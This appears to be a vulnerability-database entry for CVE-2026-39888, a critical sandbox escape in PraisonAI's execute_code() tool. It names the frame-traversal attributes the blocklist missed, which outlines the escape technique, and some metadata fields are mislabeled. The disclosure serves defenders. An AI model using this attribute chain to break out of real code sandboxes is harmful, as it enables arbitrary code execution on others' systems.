Code Execution Vulnerability in PraisonAI by Mervin Praison
CVE-2026-39888

10CRITICAL

Key Information:

Vendor: Mervinpraison
Status: Praisonaiagents
Vendor: CVE Published:; 8 April 2026

🔔 Create Mervinpraison Vulnerability Alert

What is CVE-2026-39888?

PraisonAI, a multi-agent system, has a vulnerability that allows user code execution to bypass security measures in versions prior to 1.5.115. The execute_code() function in praisonaiagents.tools.python_tools defaults to sandbox_mode="sandbox", restricting user code execution within a controlled environment. However, the embedded blocklist for restricted attributes fails to cover key elements that allow frame traversal, such as traceback, tb_frame, f_back, and f_builtins. This oversight permits an attacker to access the real Python builtins dictionary and execute arbitrary code, undermining the sandbox's intended protections. The issue is addressed in version 1.5.115.

Affected Version(s)

praisonaiagents < 1.5.115

References

https://github.com/MervinPraison/PraisonAI/security/advis...

x_refsource_CONFIRM

CVSS V3.1

Score:

Severity:

CRITICAL

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

None

Scope:

Changed

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Apr 8, 2026
Vulnerability Reserved
Apr 7, 2026

CVE-2026-39888 Data

JSON